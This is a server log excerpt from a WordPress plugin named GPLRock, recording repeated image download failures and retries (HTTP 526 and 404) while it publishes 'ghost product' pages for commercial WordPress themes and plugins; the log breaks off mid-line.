Ghost product published WITHOUT image - Product ID: hireo-job-board-freelance-services-marketplace-html-template [06-Apr-2026 21:01:59 UTC] GPLRock: Image download failed for product john-minimal-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:01 UTC] GPLRock: Image download failed for product john-minimal-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/john---minimal-personal-portfolio-wordpress-theme-12877.webp for product john-minimal-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:03 UTC] GPLRock: Image download failed for product john-minimal-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:05 UTC] GPLRock: Image download failed for product john-minimal-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/john---minimal-personal-portfolio-wordpress-theme-12877.webp for product john-minimal-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:07 UTC] GPLRock WARNING: Image download failed for product john-minimal-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/john---minimal-personal-portfolio-wordpress-theme-12877.webp [06-Apr-2026 21:02:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: john-minimal-personal-portfolio-wordpress-theme [06-Apr-2026 21:02:26 UTC] GPLRock: Image download failed for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:28 UTC] GPLRock: Image download failed for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecolife-elementor---multipurpose-prestashop-8x-9x-theme-3412.webp for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:30 UTC] GPLRock: Image download failed for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:32 UTC] GPLRock: Image download failed for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecolife-elementor---multipurpose-prestashop-8x-9x-theme-3412.webp for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:34 UTC] GPLRock WARNING: Image download failed for product ecolife-elementor-multipurpose-prestashop-8x-9x-theme. URL: https://meldwp.com/wp-content/uploads/ecolife-elementor---multipurpose-prestashop-8x-9x-theme-3412.webp [06-Apr-2026 21:02:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecolife-elementor-multipurpose-prestashop-8x-9x-theme [06-Apr-2026 21:02:34 UTC] GPLRock: Image downloaded successfully for product mne-creative-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c48dcd5.webp [06-Apr-2026 21:02:34 UTC] GPLRock: Using pre-downloaded image for product mne-creative-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c48dcd5.webp [06-Apr-2026 21:02:34 UTC] GPLRock: Ghost product published with image - Product ID: mne-creative-portfolio-wordpress-theme [06-Apr-2026 21:02:34 UTC] GPLRock: Image downloaded successfully for product netfee-broadband-and-internet-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-63a3b601.webp [06-Apr-2026 21:02:34 UTC] GPLRock: Using pre-downloaded image for product netfee-broadband-and-internet-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-63a3b601.webp [06-Apr-2026 21:02:34 UTC] GPLRock: Ghost product published with image - Product ID: netfee-broadband-and-internet-wordpress-theme [06-Apr-2026 21:02:35 UTC] GPLRock: Image downloaded successfully for product hoppers-pet-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c932f31d.webp [06-Apr-2026 21:02:35 UTC] GPLRock: Using pre-downloaded image for product hoppers-pet-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c932f31d.webp [06-Apr-2026 21:02:35 UTC] GPLRock: Ghost product published with image - Product ID: hoppers-pet-store-wordpress-theme [06-Apr-2026 21:02:35 UTC] GPLRock: Image download failed for product apsro-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:37 UTC] GPLRock: Image download failed for product apsro-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apsro---creative-design-agency-wordpress-theme-2182.webp for product apsro-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:40 UTC] GPLRock: Image download failed for product apsro-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:42 UTC] GPLRock: Image download failed for product apsro-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apsro---creative-design-agency-wordpress-theme-2182.webp for product apsro-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:44 UTC] GPLRock WARNING: Image download failed for product apsro-creative-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/apsro---creative-design-agency-wordpress-theme-2182.webp [06-Apr-2026 21:02:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: apsro-creative-design-agency-wordpress-theme [06-Apr-2026 21:02:45 UTC] GPLRock: Image download failed for product simetria-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:47 UTC] GPLRock: Image download failed for product simetria-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simetria---architecture--interior-wordpress-theme-564.webp for product simetria-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:49 UTC] GPLRock: Image download failed for product simetria-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:51 UTC] GPLRock: Image download failed for product simetria-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simetria---architecture--interior-wordpress-theme-564.webp for product simetria-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:53 UTC] GPLRock WARNING: Image download failed for product simetria-architecture-interior-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/simetria---architecture--interior-wordpress-theme-564.webp [06-Apr-2026 21:02:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simetria-architecture-interior-wordpress-theme [06-Apr-2026 21:02:53 UTC] GPLRock: Image download failed for product bebio-kindergarten-baby-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:55 UTC] GPLRock: Image download failed for product bebio-kindergarten-baby-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:02:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bebio---kindergarten--baby-care-wordpress-theme-17082.webp for product bebio-kindergarten-baby-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:02:58 UTC] GPLRock: Image download failed for product bebio-kindergarten-baby-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:00 UTC] GPLRock: Image download failed for product bebio-kindergarten-baby-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bebio---kindergarten--baby-care-wordpress-theme-17082.webp for product bebio-kindergarten-baby-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:02 UTC] GPLRock WARNING: Image download failed for product bebio-kindergarten-baby-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bebio---kindergarten--baby-care-wordpress-theme-17082.webp [06-Apr-2026 21:03:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bebio-kindergarten-baby-care-wordpress-theme [06-Apr-2026 21:03:02 UTC] GPLRock: Image download failed for product atik-a-simple-wordpress-theme-for-your-online-store (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:04 UTC] GPLRock: Image download failed for product atik-a-simple-wordpress-theme-for-your-online-store (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/atik---a-simple-wordpress-theme-for-your-online-store-13139.webp for product atik-a-simple-wordpress-theme-for-your-online-store after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:06 UTC] GPLRock: Image download failed for product atik-a-simple-wordpress-theme-for-your-online-store (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:09 UTC] GPLRock: Image download failed for product atik-a-simple-wordpress-theme-for-your-online-store (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/atik---a-simple-wordpress-theme-for-your-online-store-13139.webp for product atik-a-simple-wordpress-theme-for-your-online-store after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:11 UTC] GPLRock WARNING: Image download failed for product atik-a-simple-wordpress-theme-for-your-online-store. URL: https://meldwp.com/wp-content/uploads/atik---a-simple-wordpress-theme-for-your-online-store-13139.webp [06-Apr-2026 21:03:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: atik-a-simple-wordpress-theme-for-your-online-store [06-Apr-2026 21:03:11 UTC] GPLRock: Image download failed for product storm-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:13 UTC] GPLRock: Image download failed for product storm-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storm---magazine-and-blog-wordpress-theme-13291.webp for product storm-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:15 UTC] GPLRock: Image download failed for product storm-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:17 UTC] GPLRock: Image download failed for product storm-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storm---magazine-and-blog-wordpress-theme-13291.webp for product storm-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:19 UTC] GPLRock WARNING: Image download failed for product storm-magazine-and-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/storm---magazine-and-blog-wordpress-theme-13291.webp [06-Apr-2026 21:03:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: storm-magazine-and-blog-wordpress-theme [06-Apr-2026 21:03:19 UTC] GPLRock: Image download failed for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:22 UTC] GPLRock: Image download failed for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the7--ultimate-website--online-store-builder-for-wordpress--woocommerce-6022.webp for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:24 UTC] GPLRock: Image download failed for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:26 UTC] GPLRock: Image download failed for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:03:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the7--ultimate-website--online-store-builder-for-wordpress--woocommerce-6022.webp for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:03:28 UTC] GPLRock WARNING: Image download failed for product the7-ultimate-website-online-store-builder-for-wordpress-woocommerce. URL: https://meldwp.com/wp-content/uploads/the7--ultimate-website--online-store-builder-for-wordpress--woocommerce-6022.webp [06-Apr-2026 21:03:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the7-ultimate-website-online-store-builder-for-wordpress-woocommerce [07-Apr-2026 01:08:15 UTC] GPLRock: Image downloaded successfully for product voxel-multi-purpose-wordpress-dynamic-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2051dca.png [07-Apr-2026 01:08:15 UTC] GPLRock: Using pre-downloaded image for product voxel-multi-purpose-wordpress-dynamic-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2051dca.png [07-Apr-2026 01:08:15 UTC] GPLRock: Ghost product published with image - Product ID: voxel-multi-purpose-wordpress-dynamic-theme [07-Apr-2026 01:08:18 UTC] GPLRock: Image downloaded successfully for product booknetic-email-notifications-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd8ed4a8.webp [07-Apr-2026 01:08:18 UTC] GPLRock: Using pre-downloaded image for product booknetic-email-notifications-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd8ed4a8.webp [07-Apr-2026 01:08:18 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-email-notifications-addon [07-Apr-2026 01:08:19 UTC] GPLRock: Image downloaded successfully for product booknetic-conditional-prices-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a767b03.jpg [07-Apr-2026 01:08:20 UTC] GPLRock: Using pre-downloaded image for product booknetic-conditional-prices-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a767b03.jpg [07-Apr-2026 01:08:20 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-conditional-prices-addon [07-Apr-2026 01:08:22 UTC] GPLRock: Image downloaded successfully for product ht-mega-pro-absolute-addons-for-elementor-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee061646.jpg [07-Apr-2026 01:08:22 UTC] GPLRock: Using pre-downloaded image for product ht-mega-pro-absolute-addons-for-elementor-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee061646.jpg [07-Apr-2026 01:08:22 UTC] GPLRock: Ghost product published with image - Product ID: ht-mega-pro-absolute-addons-for-elementor-page-builder [07-Apr-2026 01:08:23 UTC] GPLRock: Image downloaded successfully for product careerup-job-board-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8e60f51.avif [07-Apr-2026 01:08:23 UTC] GPLRock: Using pre-downloaded image for product careerup-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8e60f51.avif [07-Apr-2026 01:08:23 UTC] GPLRock: Ghost product published with image - Product ID: careerup-job-board-wordpress-theme [07-Apr-2026 01:08:25 UTC] GPLRock: Image downloaded successfully for product pixelpiernyc-portfolio-creative-agency-freelancer-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bd95d0f.jpg [07-Apr-2026 01:08:25 UTC] GPLRock: Using pre-downloaded image for product pixelpiernyc-portfolio-creative-agency-freelancer-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bd95d0f.jpg [07-Apr-2026 01:08:25 UTC] GPLRock: Ghost product published with image - Product ID: pixelpiernyc-portfolio-creative-agency-freelancer-wordpress-theme [07-Apr-2026 01:08:27 UTC] GPLRock: Image downloaded successfully for product s2w-import-shopify-to-woocommerce-migrate-your-store-from-shopify-to-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d8c513f.jpg [07-Apr-2026 01:08:27 UTC] GPLRock: Using pre-downloaded image for product s2w-import-shopify-to-woocommerce-migrate-your-store-from-shopify-to-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d8c513f.jpg [07-Apr-2026 01:08:27 UTC] GPLRock: Ghost product published with image - Product ID: s2w-import-shopify-to-woocommerce-migrate-your-store-from-shopify-to-woocommerce [07-Apr-2026 01:08:29 UTC] GPLRock: Image downloaded successfully for product denticare-medical-dentist-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29572bd4.png [07-Apr-2026 01:08:29 UTC] GPLRock: Using pre-downloaded image for product denticare-medical-dentist-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29572bd4.png [07-Apr-2026 01:08:29 UTC] GPLRock: Ghost product published with image - Product ID: denticare-medical-dentist-wordpress-theme [07-Apr-2026 01:08:31 UTC] GPLRock: Image downloaded successfully for product educal-online-courses-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f715f08.jpg [07-Apr-2026 01:08:31 UTC] GPLRock: Using pre-downloaded image for product educal-online-courses-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f715f08.jpg [07-Apr-2026 01:08:31 UTC] GPLRock: Ghost product published with image - Product ID: educal-online-courses-education-wordpress-theme [07-Apr-2026 01:08:34 UTC] GPLRock: Image download failed for product woocommerce-affiliate-automatic-amazon-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 01:08:38 UTC] GPLRock: Image download failed for product woocommerce-affiliate-automatic-amazon-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 01:08:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2025/02/WooCommerce-Affiliate-Automatic-Amazon-WordPress-Plugin.png for product woocommerce-affiliate-automatic-amazon-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [07-Apr-2026 01:08:44 UTC] GPLRock: Image download failed for product woocommerce-affiliate-automatic-amazon-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 01:08:48 UTC] GPLRock: Image download failed for product woocommerce-affiliate-automatic-amazon-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 03:42:42 UTC] GPLRock: Image download failed for product simple-landing-page-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:44 UTC] GPLRock: Image download failed for product simple-landing-page-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-landing-page-for-wordpress-25680.webp for product simple-landing-page-for-wordpress after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:42:46 UTC] GPLRock: Image download failed for product simple-landing-page-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:49 UTC] GPLRock: Image download failed for product simple-landing-page-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-landing-page-for-wordpress-25680.webp for product simple-landing-page-for-wordpress after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:42:51 UTC] GPLRock WARNING: Image download failed for product simple-landing-page-for-wordpress. URL: https://meldwp.com/wp-content/uploads/simple-landing-page-for-wordpress-25680.webp [07-Apr-2026 03:42:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-landing-page-for-wordpress [07-Apr-2026 03:42:51 UTC] GPLRock: Image download failed for product infixteam-team-showcase-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:53 UTC] GPLRock: Image download failed for product infixteam-team-showcase-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infixteam---team-showcase-wordpress-plugin-6846.webp for product infixteam-team-showcase-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:42:55 UTC] GPLRock: Image download failed for product infixteam-team-showcase-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:57 UTC] GPLRock: Image download failed for product infixteam-team-showcase-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:42:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infixteam---team-showcase-wordpress-plugin-6846.webp for product infixteam-team-showcase-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:42:59 UTC] GPLRock WARNING: Image download failed for product infixteam-team-showcase-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/infixteam---team-showcase-wordpress-plugin-6846.webp [07-Apr-2026 03:42:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infixteam-team-showcase-wordpress-plugin [07-Apr-2026 03:42:59 UTC] GPLRock: Image download failed for product elementor-super-team (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:02 UTC] GPLRock: Image download failed for product elementor-super-team (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---super-team-28705.webp for product elementor-super-team after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:04 UTC] GPLRock: Image download failed for product elementor-super-team (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:06 UTC] GPLRock: Image download failed for product elementor-super-team (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---super-team-28705.webp for product elementor-super-team after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:08 UTC] GPLRock WARNING: Image download failed for product elementor-super-team. URL: https://meldwp.com/wp-content/uploads/elementor---super-team-28705.webp [07-Apr-2026 03:43:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-super-team [07-Apr-2026 03:43:08 UTC] GPLRock: Image download failed for product woocommerce-availability-scheduler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:10 UTC] GPLRock: Image download failed for product woocommerce-availability-scheduler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-availability-scheduler-5368.webp for product woocommerce-availability-scheduler after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:13 UTC] GPLRock: Image download failed for product woocommerce-availability-scheduler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:15 UTC] GPLRock: Image download failed for product woocommerce-availability-scheduler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-availability-scheduler-5368.webp for product woocommerce-availability-scheduler after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:17 UTC] GPLRock WARNING: Image download failed for product woocommerce-availability-scheduler. URL: https://meldwp.com/wp-content/uploads/woocommerce-availability-scheduler-5368.webp [07-Apr-2026 03:43:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-availability-scheduler [07-Apr-2026 03:43:17 UTC] GPLRock: Image download failed for product ultimate-timeline-responsive-timeline-history (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:19 UTC] GPLRock: Image download failed for product ultimate-timeline-responsive-timeline-history (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-timeline---responsive-timeline-history-14128.webp for product ultimate-timeline-responsive-timeline-history after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:21 UTC] GPLRock: Image download failed for product ultimate-timeline-responsive-timeline-history (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:23 UTC] GPLRock: Image download failed for product ultimate-timeline-responsive-timeline-history (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-timeline---responsive-timeline-history-14128.webp for product ultimate-timeline-responsive-timeline-history after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:25 UTC] GPLRock WARNING: Image download failed for product ultimate-timeline-responsive-timeline-history. URL: https://meldwp.com/wp-content/uploads/ultimate-timeline---responsive-timeline-history-14128.webp [07-Apr-2026 03:43:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-timeline-responsive-timeline-history [07-Apr-2026 03:43:25 UTC] GPLRock: Image download failed for product html5-video-player-with-playlist-multiple-skins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:28 UTC] GPLRock: Image download failed for product html5-video-player-with-playlist-multiple-skins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-video-player-with-playlist--multiple-skins-29724.webp for product html5-video-player-with-playlist-multiple-skins after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:30 UTC] GPLRock: Image download failed for product html5-video-player-with-playlist-multiple-skins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:32 UTC] GPLRock: Image download failed for product html5-video-player-with-playlist-multiple-skins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/html5-video-player-with-playlist--multiple-skins-29724.webp for product html5-video-player-with-playlist-multiple-skins after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:34 UTC] GPLRock WARNING: Image download failed for product html5-video-player-with-playlist-multiple-skins. URL: https://meldwp.com/wp-content/uploads/html5-video-player-with-playlist--multiple-skins-29724.webp [07-Apr-2026 03:43:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: html5-video-player-with-playlist-multiple-skins [07-Apr-2026 03:43:34 UTC] GPLRock: Image download failed for product twitter-feeds-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:36 UTC] GPLRock: Image download failed for product twitter-feeds-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitter-feeds-for-elementor-wordpress-plugin-22499.webp for product twitter-feeds-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:38 UTC] GPLRock: Image download failed for product twitter-feeds-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:40 UTC] GPLRock: Image download failed for product twitter-feeds-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitter-feeds-for-elementor-wordpress-plugin-22499.webp for product twitter-feeds-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:43 UTC] GPLRock WARNING: Image download failed for product twitter-feeds-for-elementor-wordpress-plugin. URL: 